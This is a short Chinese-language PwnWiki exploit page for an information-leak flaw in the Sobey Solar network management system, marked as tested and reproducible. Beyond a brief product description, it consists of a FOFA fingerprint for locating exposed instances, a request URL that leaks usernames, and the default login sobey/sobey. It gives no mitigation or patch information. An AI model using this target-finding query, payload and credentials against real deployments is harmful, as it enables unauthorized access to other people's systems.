Sobey(索貝)Solar网络管理系统信息泄漏漏洞

From PwnWiki
Revision as of 11:40, 22 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Check.png 該漏洞已通過驗證。
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。


Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

簡介

Solar網絡管理平台又名金字塔網絡管理系統,是一種統一管理所有後台配置的系統。其中包含台內系統的業務數據展示,基礎數據配置、任務情況顯示、日誌詳情查詢。功能齊全、展示清晰,通過不同角色的權限控制展示相應內容,科學管理台內數據。


FOFA

"application/components_solar/loginController.js"

Payload

泄漏用戶名:

http://<target>/application/components_solar/loginController.js

默認口令

sobey/sobey

Retrieved from "https://pwnwiki.com/index.php?title=Sobey(索貝)Solar网络管理系统信息泄漏漏洞&oldid=5522"